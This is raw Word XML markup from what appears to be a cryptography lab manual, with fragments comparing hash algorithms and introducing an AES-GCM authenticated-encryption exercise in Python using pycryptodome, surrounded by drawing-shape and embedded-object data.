                <v:shape id="Graphic 121" o:spid="_x0000_s1032" style="position:absolute;left:3;top:176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E/xgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvBf/DMkIvpW4SipbUVSQiFHqxammPQ3ZMgtnZJbua5N93CwVvM7z3vnmzXA+mFTfqfGNZQTpL&#10;QBCXVjdcKTgdd8+vIHxA1thaJgUjeVivJg9LzLXt+ZNuh1CJCGGfo4I6BJdL6cuaDPqZdcRRO9vO&#10;YIhrV0ndYR/hppVZksylwYbjhRodFTWVl8PVRMrcFY3Jvtz1tH/Zf4+7j6ftz0Kpx+mweQMRaAh3&#10;83/6Xcf6WQp/z8QJ5OoXAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAJGaxP8YAAADcAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==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8A964E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="21"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52B4F66B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035E36AC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5064291E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="1126"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Performance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faster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3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>because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designed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quick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hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8A4C6D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="4" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="970"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Security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more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secure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1"/>
        </w:rPr>
        <w:t xml:space="preserve"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rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>because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resistant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brute-force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 rainbow table attacks due to its slowness and salt usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA2B3FC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="526"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Comparison</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>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side-by-side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comparison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two algorithms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terms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 time and security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DFA1D6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892023C" wp14:editId="646C6B92">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>297269</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="20955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1704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76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4" y="17538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88649" id="Group 122" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.4pt;width:486.1pt;height:1.65pt;z-index:-15718912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&#10;ZXYueG1sUEsFBgAAAAAEAAQA8wAAAMIHAAAAAA==&#10;">
                <v:shape id="Graphic 123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M+wgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4X/A/LCN7qxgitRleRqrRHX+B1zI5JNDubZleN/vquUPA2H99zxtPGlOJKtSssK+h1IxDEqdUF&#10;Zwp22+X7AITzyBpLy6TgTg6mk9bbGBNtb7ym68ZnIoSwS1BB7n2VSOnSnAy6rq2IA3e0tUEfYJ1J&#10;XeMthJtSxlH0IQ0WHBpyrOgrp/S8uRgFh52e/66G8afO7sf94vv0oAM9lOq0m9kIhKfGv8T/7h8d&#10;5sd9eD4TLpCTPwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCEpOM+wgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m6172200,l,,,19685r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 124" o:spid="_x0000_s1028" style="position:absolute;left:61704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zSLwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X+h/CFLzVbKWIXY3SWgperHTV+7AZs4ubyZJkH/57Uyj0Nh/fc1ab0TaiJx9qxwpephkI4tLp&#10;mo2C0/HreQEiRGSNjWNScKMAm/Xjwwpz7Qb+ob6IRqQQDjkqqGJscylDWZHFMHUtceIuzluMCXoj&#10;tcchhdtGzrJsLi3WnBoqbGlbUXktOqtA7hdvH7fDtmtNsf/+9N1wPvRGqcnT+L4EEWmM/+I/906n&#10;+bNX+H0mXSDXdwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD8zzSLwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m3047,l,,,3048r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 125" o:spid="_x0000_s1029" style="position:absolute;left:3;top:7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XhXwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X/A9hBG81q9Kqq1G0ILSHtvhgwduwGTdLN5Mlibr9902h0Nt8fM9ZrjvbiBv5UDtWMBpmIIhL&#10;p2uuFJyOu8cZiBCRNTaOScE3BViveg9LzLW7855uh1iJFMIhRwUmxjaXMpSGLIaha4kTd3HeYkzQ&#10;V1J7vKdw28hxlj1LizWnBoMtvRgqvw5Xq6Dw3mw+P9639DZpz/U0K+bbUCg16HebBYhIXfwX/7lf&#10;dZo/foLfZ9IFcvUDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAJfF4V8MAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m3048,3048l,3048,,16764r3048,l3048,3048xem6173152,r-3035,l6170117,3048r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 126" o:spid="_x0000_s1030" style="position:absolute;left:61704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WLwQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE89a8Mw&#10;EN0L+Q/iCllKLCeDKY6VUBoKGYyhdul8WFfLxDoZSU2cf18VCt3u8T6vOi52ElfyYXSsYJvlIIh7&#10;p0ceFHx0b5tnECEia5wck4I7BTgeVg8Vltrd+J2ubRxECuFQogIT41xKGXpDFkPmZuLEfTlvMSbo&#10;B6k93lK4neQuzwtpceTUYHCmV0P9pf22Cp64qRszdhd76j673NehmWSt1PpxedmDiLTEf/Gf+6zT&#10;/F0Bv8+kC+ThBwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFG2VYvBAAAA3AAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m3047,l,,,13715r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 127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P8wAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Li8Iw&#10;EL4v+B/CCN7WVMEH1Si6IMh62urF29iMbbWZlCRru//eCAve5uN7znLdmVo8yPnKsoLRMAFBnFtd&#10;caHgdNx9zkH4gKyxtkwK/sjDetX7WGKqbcs/9MhCIWII+xQVlCE0qZQ+L8mgH9qGOHJX6wyGCF0h&#10;tcM2hptajpNkKg1WHBtKbOirpPye/RoFZHPMkvb7cLG33f18yyZuqydKDfrdZgEiUBfe4n/3Xsf5&#10;4xm8nokXyNUTAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA4ZSj/MAAAADcAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m3047,l,,,3047r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 128" o:spid="_x0000_s1032" style="position:absolute;left:3;top:175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BiixQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;EMXvQr/DMoVepG4aipbUVYpFKPTiX/Q4ZKdJaHZ2ya4av71zELy9Yd785r3pvHetOlMXG88G3kYZ&#10;KOLS24YrA7vt8vUDVEzIFlvPZOBKEeazp8EUC+svvKbzJlVKIBwLNFCnFAqtY1mTwzjygVh2f75z&#10;mGTsKm07vAjctTrPsrF22LB8qDHQoqbyf3NyQhmHRePyfTjtVu+rw3X5O/w+Tox5ee6/PkEl6tPD&#10;fL/+sRI/l7RSRhTo2Q0AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQC1XBiixQAAANw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508008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4CA552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1302"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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AES-GCM (Authenticated Encryption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6F22B6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B939DD8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="360" w:right="426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r>
        <w:t>: To implement a Python script that encrypts and authenticates messages using the AES-GCM mode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authenticated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encryption,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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confidentiality,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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authenticity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491B5FE1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3A109B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2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 w14:paraId="609BEA4A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58780CD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3.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1092A7B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3" w:line="268" w:lineRule="exact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pycryptodome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rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>library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AES-GCM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encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653A10F8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line="267" w:lineRule="exact"/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editor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(VSCode,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Sublime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etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA9D7F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rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Command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terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CF8283" w14:textId="77777777" w:rsidR="00A16F47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E67AD96" wp14:editId="5A7B1C65">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>297588</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="20955"/>
                <wp:effectExtent l="0" t="0" r="0" b="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1704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647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704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4" y="17411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CDAA4" id="Group 129" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.45pt;width:486.1pt;height:1.65pt;z-index:-15718400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&#10;AAAAAAQABADzAAAAuAcAAAAA&#10;">
                <v:shape id="Graphic 130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+uUxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bb8Iw&#10;DIXvSPyHyEi7QQpIGxQCQoxpO26AxNU0pi00TtdkUPj182HSbrbe83uf58vWVepKTSg9GxgOElDE&#10;mbcl5wb2u7f+BFSIyBYrz2TgTgGWi25njqn1N/6i6zbmSkI4pGigiLFOtQ5ZQQ7DwNfEop184zDK&#10;2uTaNniTcFfpUZI8a4clS0OBNa0Lyi7bH2fguLev35/T0YvN76fD5v38oCM9jHnqtasZqEht/Df/&#10;XX9YwR8LvjwjE+jFLwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDxr+uUxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m6172200,l,,,19685r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 131" o:spid="_x0000_s1028" style="position:absolute;left:61704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HOwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X+h/CFLzVrC0UXY3SWgperLjqfdiM2cXNZEmyD/99Uyj0Nh/fc1ab0TaiJx9qxwpm0wwEcel0&#10;zUbB+fT1PAcRIrLGxjEpuFOAzfrxYYW5dgMfqS+iESmEQ44KqhjbXMpQVmQxTF1LnLir8xZjgt5I&#10;7XFI4baRL1n2Ji3WnBoqbGlbUXkrOqtA7ueLj/th27Wm2H9/+m64HHqj1ORpfF+CiDTGf/Gfe6fT&#10;/NcZ/D6TLpDrHwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBpYQHOwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m3047,l,,,3047r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 132" o:spid="_x0000_s1029" style="position:absolute;left:3;top:6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b+wwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X+h/CCN40q0Krq1G0ILQHW6qy4G3YjJvFzWRJUt3++0YQepvH+5zFqrONuJIPtWMFo2EGgrh0&#10;uuZKwfGwHUxBhIissXFMCn4pwGr5/LTAXLsbf9N1HyuRQjjkqMDE2OZShtKQxTB0LXHizs5bjAn6&#10;SmqPtxRuGznOshdpsebUYLClN0PlZf9jFRTem/XX525DH5P2VL9mxWwTCqX6vW49BxGpi//ih/td&#10;p/mTMdyfSRfI5R8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAL8F2/sMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m3048,3035l,3035,,16751r3048,l3048,3035xem6173152,r-3035,l6170117,3035r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
